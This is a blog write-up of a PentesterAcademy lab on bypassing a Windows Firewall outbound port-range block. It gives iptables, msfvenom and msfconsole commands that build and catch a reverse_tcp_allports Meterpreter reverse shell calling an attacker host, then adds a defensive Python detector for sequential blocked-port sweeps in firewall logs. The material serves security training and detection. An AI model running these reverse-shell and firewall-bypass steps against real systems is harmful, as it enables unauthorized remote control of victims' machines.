Where Notes Work
Firewall Bypass: Outbound Range
Hello friends, in this post I'll share how you can bypass the Windows Firewall (Automatic Outbound Open Port Detection).
I solved this lab on PentesterAcademy; you can do the lab there too if you are a subscribed member.
Scenario: a Windows machine is running with the firewall turned on and the outbound port range 4444-6009 blocked. The task is to knock all ports and get a reverse shell using Metasploit.
Below, we can see that the blocked port range is defined as 4444-6009.
On our attacker machine, I use iptables to redirect the whole range 4444-6010 to port 4444, so whichever port the victim finally reaches, the connection lands on the handler:
$ iptables -A PREROUTING -t nat -i eth0 -p tcp --dport 4444:6010 -j DNAT --to-destination 10.5.17.234:4444
// --to-destination is the attacker machine's IP address; the range ends at 6010 because that is the first port outside the blocked range.
After setting up the iptables rule, I create the payload with msfvenom:
$ msfvenom -p windows/meterpreter/reverse_tcp_allports lhost=10.5.17.234 lport=4444 -f exe -o bypass.exe
// reverse_tcp_allports knocks on every port in turn until it finds one the firewall lets through.
Now transfer the file to the victim machine, e.g. by downloading it with PowerShell.
Now open msfconsole and start the handler:
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp_allports
msf6 exploit(multi/handler) > set lhost eth0
msf6 exploit(multi/handler) > set lport 4444
msf6 exploit(multi/handler) > exploit
Now we can see that we have our reverse shell.
If you face any problems, let me know in the comments section.
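From the defender's side, the thing to notice is that a port-range block does not stop this payload, it only makes it noisy: the firewall log fills with blocked outbound attempts to consecutive ports on one destination, followed by an allowed connection on the first open port. Below is an added example (my own code, not part of the lab or of Metasploit) that reads log lines in the Windows Firewall pfirewall.log layout and flags exactly that pattern. The log lines, hosts and timestamps are constructed for the example, and the thresholds (min_ports, min_run) are assumptions you would tune to your environment.

```python
"""Flag hosts sweeping outbound ports toward one destination in a Windows Firewall log.

A reverse_tcp_allports payload walks through destination ports one after another
until the firewall lets one through, so a range block produces a burst of DROP
records to consecutive ports on the same destination, then an ALLOW. This
script groups records by (source, destination) and alerts on that shape.
"""
from collections import defaultdict

# Constructed sample in the pfirewall.log layout:
#   date time action protocol src-ip dst-ip src-port dst-port size tcpflags ...
# Hosts, ports and timestamps are made up for this example.
SAMPLE_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2024-01-01 10:00:00 ALLOW TCP 10.5.17.50 10.5.17.1 49152 53 0 - 0 0 0 - - - SEND
2024-01-01 10:00:01 DROP TCP 10.5.17.50 10.5.17.234 49201 4444 52 S 12345 0 8192 - - - SEND
2024-01-01 10:00:01 DROP TCP 10.5.17.50 10.5.17.234 49202 4445 52 S 12346 0 8192 - - - SEND
2024-01-01 10:00:01 DROP TCP 10.5.17.50 10.5.17.234 49203 4446 52 S 12347 0 8192 - - - SEND
2024-01-01 10:00:01 DROP TCP 10.5.17.50 10.5.17.234 49204 4447 52 S 12348 0 8192 - - - SEND
2024-01-01 10:00:02 DROP TCP 10.5.17.50 10.5.17.234 49205 4448 52 S 12349 0 8192 - - - SEND
2024-01-01 10:00:02 DROP TCP 10.5.17.50 10.5.17.234 49206 4449 52 S 12350 0 8192 - - - SEND
2024-01-01 10:00:02 DROP TCP 10.5.17.50 10.5.17.234 49207 4450 52 S 12351 0 8192 - - - SEND
2024-01-01 10:00:02 DROP TCP 10.5.17.50 10.5.17.234 49208 4451 52 S 12352 0 8192 - - - SEND
2024-01-01 10:00:03 ALLOW TCP 10.5.17.50 10.5.17.234 49210 6010 0 - 0 0 0 - - - SEND
2024-01-01 10:00:05 ALLOW TCP 10.5.17.60 10.5.17.234 49300 443 0 - 0 0 0 - - - SEND
2024-01-01 10:00:06 DROP TCP 10.5.17.60 10.5.17.234 49301 445 52 S 22345 0 8192 - - - SEND
2024-01-01 10:00:07 DROP TCP 10.5.17.60 10.5.17.234 49302 3389 52 S 22346 0 8192 - - - SEND
"""


def parse_firewall_log(text):
    """Yield (action, src_ip, dst_ip, dst_port) for each TCP record.

    Header lines (starting with '#') and malformed or non-TCP lines are skipped.
    """
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 8 or fields[3] != "TCP":
            continue
        try:
            dport = int(fields[7])
        except ValueError:
            continue
        yield fields[2], fields[4], fields[5], dport


def longest_consecutive_run(ports):
    """Length of the longest run of consecutive integers in a collection of ports."""
    present = set(ports)
    best = 0
    for port in present:
        if port - 1 in present:
            continue  # only count from the start of each run
        length = 1
        while port + length in present:
            length += 1
        best = max(best, length)
    return best


def find_port_sweeps(text, min_ports=5, min_run=5):
    """Return one alert per (src, dst) pair whose blocked attempts cover at least
    min_ports distinct ports and include a run of min_run consecutive ports.

    Each alert also lists the ports that were later allowed to the same
    destination, which is where the sweep finally got out.
    """
    dropped = defaultdict(set)
    allowed = defaultdict(set)
    for action, src, dst, dport in parse_firewall_log(text):
        bucket = dropped if action == "DROP" else allowed
        bucket[(src, dst)].add(dport)

    alerts = []
    for (src, dst), ports in sorted(dropped.items()):
        run = longest_consecutive_run(ports)
        if len(ports) >= min_ports and run >= min_run:
            alerts.append({
                "src": src,
                "dst": dst,
                "blocked_ports": len(ports),
                "consecutive_run": run,
                "first_port": min(ports),
                "last_port": max(ports),
                "allowed_after": sorted(allowed.get((src, dst), ())),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_port_sweeps(SAMPLE_LOG):
        print(alert)
```

With the constructed sample, 10.5.17.50 is flagged (eight consecutive blocked ports 4444-4451, then an allowed connection on 6010), while 10.5.17.60, which only has two unrelated drops, is not. The mitigation the log points at is the usual one: a default-deny outbound policy with explicit allows, since any range-based block leaves the first unblocked port for the payload to find.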